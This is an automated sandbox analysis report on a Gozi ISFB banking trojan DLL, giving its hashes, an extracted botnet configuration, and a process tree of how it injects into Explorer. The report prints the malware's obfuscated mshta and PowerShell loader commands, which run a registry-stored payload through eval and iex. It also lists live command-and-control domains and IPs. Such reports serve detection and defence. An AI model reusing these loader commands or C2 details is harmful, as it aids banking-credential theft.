gozi_ifsb | 49c54e18e22e5c82d591ff5345a4c660f2c80e14fcbe4c3a7d1df43654e40e86

Analysis

max time kernel
154s
max time network
141s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
20/09/2022, 13:08

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

6329b3a546054tiff.dll
Size

511KB
MD5

dbe0888d7edb236b38d0dcfd33dd0a06
SHA1

f53a59741ddc982af5b77bd77ab99f74e9b33948
SHA256

49c54e18e22e5c82d591ff5345a4c660f2c80e14fcbe4c3a7d1df43654e40e86
SHA512

b893e59fb0cf5db3ae076798849e467b239c7be30917cff40b5df6d5f9feadb50e90ba728ea9955f628c27e519c407f5b7c4b12eba002064387846e7662e2473
SSDEEP

6144:yTZBx+7jsPTl/N80J849j3si2Hw2Kfl0OA5P1rh/YwOnhu58jT7FWQ+ICBFQ5jyy:YZP+7jsZS0r59Qw3RxjkeP

Score

10^/10

gozi_ifsb 3000 banker trojan

Malware Config

Extracted

Family

gozi_ifsb

Botnet

3000

config.edge.skype.com

89.41.26.99

89.45.4.102

interstarts.top

superlist.top

internetcoca.in

Attributes

base_path
/drew/
build
250246
exe_type
loader
extension
.jlk
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi_ifsb

Botnet

3000

interliner.top

interlinel.top

superliner.top

superlinez.top

internetlined.com

internetlines.in

medialists.su

medialists.ru

mediawagi.info

mediawagi.ru

89.41.26.90

89.41.26.93

denterdrigx.com

digserchx.at

Attributes

base_path
/images/
build
250246
exe_type
worker
extension
.jlk
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
banker trojan gozi_ifsb

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 4340 set thread context of 2424	4340	powershell.exe	17
PID 2424 set thread context of 3456	2424	Explorer.EXE	18
PID 2424 set thread context of 3744	2424	Explorer.EXE	45
PID 2424 set thread context of 4820	2424	Explorer.EXE	42
PID 2424 set thread context of 4908	2424	Explorer.EXE	97

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5024	regsvr32.exe
5024	regsvr32.exe
4340	powershell.exe
4340	powershell.exe
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
4340	powershell.exe
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE
2424	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	4340	powershell.exe
Token: SeShutdownPrivilege	2424	Explorer.EXE
Token: SeCreatePagefilePrivilege	2424	Explorer.EXE
Token: SeShutdownPrivilege	2424	Explorer.EXE
Token: SeCreatePagefilePrivilege	2424	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2424	Explorer.EXE

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 3060 wrote to memory of 5024	3060	regsvr32.exe	80
PID 3060 wrote to memory of 5024	3060	regsvr32.exe	80
PID 3060 wrote to memory of 5024	3060	regsvr32.exe	80
PID 4600 wrote to memory of 4340	4600	mshta.exe	91
PID 4600 wrote to memory of 4340	4600	mshta.exe	91
PID 4340 wrote to memory of 1748	4340	powershell.exe	93
PID 4340 wrote to memory of 1748	4340	powershell.exe	93
PID 1748 wrote to memory of 2296	1748	csc.exe	94
PID 1748 wrote to memory of 2296	1748	csc.exe	94
PID 4340 wrote to memory of 2340	4340	powershell.exe	95
PID 4340 wrote to memory of 2340	4340	powershell.exe	95
PID 2340 wrote to memory of 1568	2340	csc.exe	96
PID 2340 wrote to memory of 1568	2340	csc.exe	96
PID 4340 wrote to memory of 2424	4340	powershell.exe	17
PID 4340 wrote to memory of 2424	4340	powershell.exe	17
PID 4340 wrote to memory of 2424	4340	powershell.exe	17
PID 4340 wrote to memory of 2424	4340	powershell.exe	17
PID 2424 wrote to memory of 3456	2424	Explorer.EXE	18
PID 2424 wrote to memory of 3456	2424	Explorer.EXE	18
PID 2424 wrote to memory of 3456	2424	Explorer.EXE	18
PID 2424 wrote to memory of 3456	2424	Explorer.EXE	18
PID 2424 wrote to memory of 3744	2424	Explorer.EXE	45
PID 2424 wrote to memory of 3744	2424	Explorer.EXE	45
PID 2424 wrote to memory of 3744	2424	Explorer.EXE	45
PID 2424 wrote to memory of 3744	2424	Explorer.EXE	45
PID 2424 wrote to memory of 4820	2424	Explorer.EXE	42
PID 2424 wrote to memory of 4820	2424	Explorer.EXE	42
PID 2424 wrote to memory of 4820	2424	Explorer.EXE	42
PID 2424 wrote to memory of 4820	2424	Explorer.EXE	42
PID 2424 wrote to memory of 4908	2424	Explorer.EXE	97
PID 2424 wrote to memory of 4908	2424	Explorer.EXE	97
PID 2424 wrote to memory of 4908	2424	Explorer.EXE	97
PID 2424 wrote to memory of 4908	2424	Explorer.EXE	97
PID 2424 wrote to memory of 4908	2424	Explorer.EXE	97
PID 2424 wrote to memory of 4908	2424	Explorer.EXE	97

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2424
- C:\Windows\system32\regsvr32.exe
  regsvr32 /s C:\Users\Admin\AppData\Local\Temp\6329b3a546054tiff.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3060
- - C:\Windows\SysWOW64\regsvr32.exe
    /s C:\Users\Admin\AppData\Local\Temp\6329b3a546054tiff.dll
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5024
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bmav='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bmav).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\51C98FB5-7C72-AB2B-0E15-700F2219A4B3\\\TypePack'));if(!window.flag)close()</script>"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4600
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name yhdmxbnxj -value gp; new-alias -name pattnarqh -value iex; pattnarqh ([System.Text.Encoding]::ASCII.GetString((yhdmxbnxj "HKCU:Software\AppDataLow\Software\Microsoft\51C98FB5-7C72-AB2B-0E15-700F2219A4B3").VirtualWhite))
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4340
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ds5glaah\ds5glaah.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1748
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES18A4.tmp" "c:\Users\Admin\AppData\Local\Temp\ds5glaah\CSC51659D7BF65549E1863FB56536CCB3F.TMP"
        5⤵
        
        PID:2296
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m5uui25u\m5uui25u.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2340
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1921.tmp" "c:\Users\Admin\AppData\Local\Temp\m5uui25u\CSC91954CD6B56C42009888DF7774F7928.TMP"
        5⤵
        
        PID:1568
- C:\Windows\syswow64\cmd.exe
  "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
  2⤵
  PID:4908

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3456

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4820

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3744

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES18A4.tmp

Filesize
1KB

MD5
fff07a5821d7a79a94929c8f7b679dc3

SHA1
36a06bfc2465176ccd568bf57901c2e05d7efa1c

SHA256
7a23cd8922682363a11ca900bc57fb25615dc1db74d49596620dc781a6ce10fb

SHA512
88c463960f30b430fffcfead46d255d13574e0e3f4f08a247fa5368c536da1a779915c05c93592191d88eeef6f6aa6107362b44ff1731dbc373f856cabf9be50

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES1921.tmp

Filesize
1KB

MD5
0995e3fbce8894cef9d6d987d8290b8f

SHA1
1ff1503f13e32a05db1c370592d21d8ea4eee291

SHA256
05f34cf21d745ad3a38257344122e8902f4f31461d46f50eda32db0757c42dba

SHA512
99f4cd0d87e624dc3d8fe2801ede62cd4a0121da59646a31e848afa0890b2f59dc05ec096eaedd5aaf40c0011d477ad7a9e129a8408bdbff2f39f9901e7fc2a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\ds5glaah\ds5glaah.dll

Filesize
3KB

MD5
9c7ce15f9a1a11dbee25c7a9354d6f8c

SHA1
08447c4ca7ec973fa00de3918b48ef716cf6d4bf

SHA256
f0ac78e6dabfdd811d7a2210c4c41b1c2b6208be5a1f5d38c2a0dd969cb4bf69

SHA512
5f858ae985f0f2c2c135d076dcee580a99aa73a65e580a79666dcbb28b3f8350e9fb39f6d5eee6296415c8f461d79d3957ee9c4987aa4125f2899d7e3335fd40

Download Submit
C:\Users\Admin\AppData\Local\Temp\m5uui25u\m5uui25u.dll

Filesize
3KB

MD5
1b92c0550f82a3173662c1eb54d52f7a

SHA1
222229b1534b2752910da43b00f3f66f6540dd12

SHA256
8c8d193044610110795ac9b4d6e0944c6364e4e232421b9d6a2013d3087472d7

SHA512
82ad5085c6e71aa59d58fc361db19776aeb087cc3ff74d0b68a53a92092c0314708acb9bd9702689f628155d3abf41a8287799c50e0ff3435a5a5181cf656824

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ds5glaah\CSC51659D7BF65549E1863FB56536CCB3F.TMP

Filesize
652B

MD5
53d1b8cade8c056bc1a947e29c7a713c

SHA1
7668d92130105487499d761b0e11704a5710d2e3

SHA256
db0351233ec4eaea89ec99f7fbce5d6d574bf4eee5c87d1b857f915859a9df6b

SHA512
6f0ed53ad9610231e8ff9d74353e519cc5ad6b49a0b72791673fe0eb131fabea99a2734334fd9036260701a6b0d18e002f324dbf1b209f245a65cd0cc43ddf12

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ds5glaah\ds5glaah.0.cs

Filesize
418B

MD5
19fd6f555ad7c58d574c00f46f087b02

SHA1
025ec4778721f20fdbff775edd2351baea93846c

SHA256
9d08df39ad05bd4a53f416ab8ef6a2fca313eb9a1498e451284b445bb1830dac

SHA512
188488549588e593523ddab3a8372d47e016841c3ce1594a456c0ac7c73763a3ae1e8a5fffdc7b6455bd869d0f6bdebd6b6bcb2aa6a6b4cf658231ce72dc40b9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ds5glaah\ds5glaah.cmdline

Filesize
369B

MD5
179cf7b51a7e338e873cdcd2dec5cf2b

SHA1
9a36422a2443cc9e916545076ad2ef2afaff50fb

SHA256
1ae03a954ff018ffd3e9ad41827e6f59570e6f38fedc00a68d9fa0a392ab7efc

SHA512
3b09be2dee9fda236d212a839538561b0f5d89c1b0717f5248d4c8fb4c8c643ed612469b2b734bfc9575db0d9adeadec697b3cb4cae85f91a4106836bd13e8a3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\m5uui25u\CSC91954CD6B56C42009888DF7774F7928.TMP

Filesize
652B

MD5
7b0d9a8a10778f08398e56aa883b0c3d

SHA1
f813483ae8842223831ddc3776167ddcdb530911

SHA256
3d582301304c5152384f118998edbd716ebdd9aae8f17e7a6c2359957e10bcc1

SHA512
5be97722b1e8881132fcc87e4dea884e56464d12f773b9d4d462f9c94dcabd584cf1c75fc6e4f712602c1dd5a4069c7f005dc0bad4282ca592f9a749d0cb7c62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\m5uui25u\m5uui25u.0.cs

Filesize
400B

MD5
f31a91cb873d422f30e84bfc6f0e4919

SHA1
87946e5b050bc8c66c9f04ebb9f82e210522d8ee

SHA256
91af8fc99b650c87f7c49faa1e0499f673e034ed712eb62782cfacbdf8329f84

SHA512
242e12d8c01ef5bf6866fc09bd8a4ab9fb6c7ea1ac4bead56610db30f15f0c7b38d7da8706ab4bb8ad5647d5b2ccfb9717b85324ca0099c6dcdd7fde13e5906b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\m5uui25u\m5uui25u.cmdline

Filesize
369B

MD5
875340b6c05e9459c8020c2341c74f22

SHA1
2f165fb924303b72fcf373893bb6aa8cc504429b

SHA256
01ad638cd96be1b979a44a473b36971423db4be704f8ae431ce3823e7fd7525f

SHA512
46b4fe0f7009c72d1784cff903d5690c2937b22b51340577e117ed8e902293bf3dac4b3b62345808c3a9ab4bb0a3b09d7de722c731289f8aa12525531be2b11c

Download Submit
memory/2424-169-0x0000000008900000-0x00000000089A3000-memory.dmp

Filesize
652KB

Download
memory/2424-164-0x0000000008900000-0x00000000089A3000-memory.dmp

Filesize
652KB

Download
memory/3456-162-0x0000022930580000-0x0000022930623000-memory.dmp

Filesize
652KB

Download
memory/3744-163-0x000001FE38A30000-0x000001FE38AD3000-memory.dmp

Filesize
652KB

Download
memory/4340-145-0x00007FFEA50E0000-0x00007FFEA5BA1000-memory.dmp

Filesize
10.8MB

Download
memory/4340-144-0x000001EF0D050000-0x000001EF0D072000-memory.dmp

Filesize
136KB

Download
memory/4340-160-0x00007FFEA50E0000-0x00007FFEA5BA1000-memory.dmp

Filesize
10.8MB

Download
memory/4340-161-0x000001EF26D50000-0x000001EF26D8D000-memory.dmp

Filesize
244KB

Download
memory/4820-165-0x0000021343D80000-0x0000021343E23000-memory.dmp

Filesize
652KB

Download
memory/4908-167-0x0000000000066B20-0x0000000000066B24-memory.dmp

Filesize
4B

Download
memory/4908-168-0x0000000001350000-0x00000000013E6000-memory.dmp

Filesize
600KB

Download
memory/5024-133-0x0000000010000000-0x000000001000E000-memory.dmp

Filesize
56KB

Download
memory/5024-138-0x00000000007D0000-0x00000000007D5000-memory.dmp

Filesize
20KB

Download
memory/5024-139-0x0000000000800000-0x000000000080D000-memory.dmp

Filesize
52KB

Download